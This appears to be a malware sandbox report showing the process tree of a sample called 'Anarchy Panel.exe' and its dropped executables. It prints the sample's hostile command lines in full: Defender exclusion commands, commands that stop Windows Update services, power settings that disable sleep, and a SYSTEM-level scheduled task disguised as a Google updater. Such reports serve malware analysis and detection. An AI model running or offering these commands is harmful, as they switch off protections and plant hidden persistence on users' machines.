C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2616
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2512
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2452
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
PID:2424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2316
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3492
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3492 -s 4842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4248
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3788
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3632
-
  C:\Windows\system32\WerFault.exe (depth 2)
    Command line: C:\Windows\system32\WerFault.exe -u -p 3632 -s 388
    - Program crash
    PID: 2304

C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  PID: 3292

C:\Windows\Explorer.EXE (depth 1)
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of UnmapMainImage
  PID: 3136

  C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe (depth 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID: 3108

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 1452

      C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm0.exe (depth 4)
        Command line: "C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm0.exe"
        - Executes dropped EXE
        PID: 4956

      C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm1.exe (depth 4)
        Command line: "C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm1.exe"
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Drops file in Program Files directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        PID: 1496

      C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm2.exe (depth 4)
        Command line: "C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm2.exe"
        - Executes dropped EXE
        - Adds Run key to start application
        PID: 848

        C:\Windows\System32\Conhost.exe (depth 5)
          Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          PID: 4440

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 3096

  C:\Windows\System32\cmd.exe (depth 2)
    Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    - Suspicious use of WriteProcessMemory
    PID: 1844

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop UsoSvc
      - Launches sc.exe
      PID: 4452

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop WaaSMedicSvc
      - Launches sc.exe
      PID: 1076

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop wuauserv
      - Launches sc.exe
      PID: 2164

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop bits
      - Launches sc.exe
      PID: 1424

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop dosvc
      - Launches sc.exe
      PID: 1448

  C:\Windows\System32\cmd.exe (depth 2)
    Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Suspicious use of WriteProcessMemory
    PID: 3344

    C:\Windows\System32\powercfg.exe (depth 3)
      Command line: powercfg /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
      PID: 2160

    C:\Windows\System32\powercfg.exe (depth 3)
      Command line: powercfg /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
      PID: 1932

    C:\Windows\System32\powercfg.exe (depth 3)
      Command line: powercfg /x -standby-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
      PID: 3628

    C:\Windows\System32\powercfg.exe (depth 3)
      Command line: powercfg /x -standby-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
      PID: 4216

  C:\Windows\System32\dialer.exe (depth 2)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 1700

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2308

    C:\Windows\System32\Conhost.exe (depth 3)
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 916

  C:\Windows\System32\schtasks.exe (depth 2)
    Command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineCPS"
    PID: 1988

    C:\Windows\System32\Conhost.exe (depth 3)
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 3220

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID: 536

    C:\Windows\System32\Conhost.exe (depth 3)
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 836

  C:\Windows\System32\cmd.exe (depth 2)
    Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    PID: 2092

    C:\Windows\System32\Conhost.exe (depth 3)
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 4480

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop UsoSvc
      - Launches sc.exe
      PID: 2964

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop WaaSMedicSvc
      - Launches sc.exe
      PID: 4632

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop wuauserv
      - Launches sc.exe
      PID: 3308

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop bits
      - Launches sc.exe
      PID: 2732

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop dosvc
      - Launches sc.exe
      PID: 3432

  C:\Windows\System32\cmd.exe (depth 2)
    Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    PID: 4956

    C:\Windows\System32\Conhost.exe (depth 3)
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 1272

    C:\Windows\System32\powercfg.exe (depth 3)
      Command line: powercfg /x -hibernate-timeout-ac 0
      PID: 3588

    C:\Windows\System32\powercfg.exe (depth 3)
      Command line: powercfg /x -hibernate-timeout-dc 0
      PID: 2212

    C:\Windows\System32\powercfg.exe (depth 3)
      Command line: powercfg /x -standby-timeout-ac 0
      PID: 3376

    C:\Windows\System32\powercfg.exe (depth 3)
      Command line: powercfg /x -standby-timeout-dc 0
      PID: 3512

  C:\Windows\System32\dialer.exe (depth 2)
    PID: 1472

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }
    - Modifies data under HKEY_USERS
    PID: 5104

    C:\Windows\System32\Conhost.exe (depth 3)
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 2700

  C:\Windows\System32\dialer.exe (depth 2)
    PID: 3512

  C:\Windows\System32\dialer.exe (depth 2)
    PID: 2772

  C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm2.exe (depth 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm2.exe"
    PID: 3212

  C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm1.exe (depth 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm1.exe"
    PID: 2548

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    PID: 3784

  C:\Windows\System32\cmd.exe (depth 2)
    Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    PID: 3208

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop UsoSvc
      - Launches sc.exe
      PID: 1580

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop WaaSMedicSvc
      - Launches sc.exe
      PID: 3564

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop wuauserv
      - Launches sc.exe
      PID: 4044

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop bits
      - Launches sc.exe
      PID: 2796

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop dosvc
      - Launches sc.exe
      PID: 1344

  C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm0.exe (depth 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm0.exe"
    PID: 3656

  C:\Windows\System32\cmd.exe (depth 2)
    Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    PID: 1548

    C:\Windows\System32\powercfg.exe (depth 3)
      Command line: powercfg /x -hibernate-timeout-ac 0
      PID: 4200

    C:\Windows\System32\powercfg.exe (depth 3)
      Command line: powercfg /x -hibernate-timeout-dc 0
      PID: 4820

    C:\Windows\System32\powercfg.exe (depth 3)
      Command line: powercfg /x -standby-timeout-ac 0
      PID: 4144

    C:\Windows\System32\powercfg.exe (depth 3)
      Command line: powercfg /x -standby-timeout-dc 0
      PID: 3648

  C:\Windows\System32\dialer.exe (depth 2)
    PID: 908

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }
    PID: 4512

  C:\Windows\System32\schtasks.exe (depth 2)
    Command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineCPS"
    PID: 2248

  C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe (depth 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"
    PID: 2780

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      PID: 3612

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    PID: 3944

  C:\Windows\System32\cmd.exe (depth 2)
    Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    PID: 220

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop UsoSvc
      - Launches sc.exe
      PID: 4980

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop WaaSMedicSvc
      - Launches sc.exe
      PID: 3604

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop wuauserv
      - Launches sc.exe
      PID: 2064

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop bits
      - Launches sc.exe
      PID: 2284

    C:\Windows\System32\sc.exe (depth 3)
      Command line: sc stop dosvc
      - Launches sc.exe
      PID: 4596

  C:\Windows\System32\dialer.exe (depth 2)
    PID: 4912

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }
    PID: 2472

C:\Windows\system32\wbem\unsecapp.exe (depth 1)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 3052

C:\Windows\System32\svchost.exe (depth 1)
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
  PID: 2076

C:\Windows\System32\spoolsv.exe (depth 1)
  PID: 2044

C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
  PID: 1976

C:\Windows\System32\svchost.exe (depth 1)
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
  PID: 1968

C:\Windows\System32\svchost.exe (depth 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
  PID: 1868

C:\Windows\System32\svchost.exe (depth 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
  PID: 1808

C:\Windows\System32\svchost.exe (depth 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
  PID: 1772

C:\Windows\System32\svchost.exe (depth 1)
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
  PID: 1676

C:\Windows\System32\svchost.exe (depth 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
  PID: 1660

C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
  PID: 1588

C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
  PID: 1556

C:\Windows\System32\svchost.exe (depth 1)
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
  PID: 1440

C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
  PID: 1428

C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  PID: 1408

C:\Windows\System32\RuntimeBroker.exe (depth 1)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID: 3584

C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
  PID: 1324

C:\Windows\System32\svchost.exe (depth 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  - Drops file in System32 directory
  PID: 1228

C:\Windows\System32\RuntimeBroker.exe (depth 1)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID: 4904

C:\Windows\System32\svchost.exe (depth 1)
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p
  PID: 1160

C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  PID: 1800

C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -s W32Time
  PID: 4432

C:\Windows\System32\svchost.exe (depth 1)
  Command line: C:\Windows\System32\svchost.exe -k WerSvcGroup
  - Suspicious behavior: EnumeratesProcesses
  PID: 3716

  C:\Windows\system32\WerFault.exe (depth 2)
    Command line: C:\Windows\system32\WerFault.exe -pss -s 404 -p 3492 -ip 3492
    PID: 1728

  C:\Windows\system32\WerFault.exe (depth 2)
    Command line: C:\Windows\system32\WerFault.exe -pss -s 488 -p 3632 -ip 3632
    PID: 336

  C:\Windows\system32\WerFault.exe (depth 2)
    Command line: C:\Windows\system32\WerFault.exe -pss -s 508 -p 4676 -ip 4676
    PID: 2504

  C:\Windows\system32\WerFault.exe (depth 2)
    Command line: C:\Windows\system32\WerFault.exe -pss -s 568 -p 1120 -ip 1120
    PID: 3452

C:\Windows\System32\svchost.exe (depth 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
  PID: 3972

C:\Windows\system32\SppExtComObj.exe (depth 1)
  Command line: C:\Windows\system32\SppExtComObj.exe -Embedding
  PID: 3860

C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  PID: 4680

C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
  PID: 5052

C:\Windows\System32\svchost.exe (depth 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
  PID: 3260

C:\Windows\servicing\TrustedInstaller.exe (depth 1)
  PID: 3340

C:\Windows\system32\DllHost.exe (depth 1)
  Command line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  PID: 1448

C:\Windows\system32\WerFault.exe (depth 1)
  Command line: C:\Windows\system32\WerFault.exe -u -p 4676 -s 228
  - Program crash
  PID: 1784

C:\Windows\system32\WerFault.exe (depth 1)
  Command line: C:\Windows\system32\WerFault.exe -u -p 1120 -s 388
  - Program crash
  PID: 4476

C:\Windows\System32\rundll32.exe (depth 1)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 3480
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (Filesize 4KB)
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (Filesize 1KB; listed twice with differing hashes)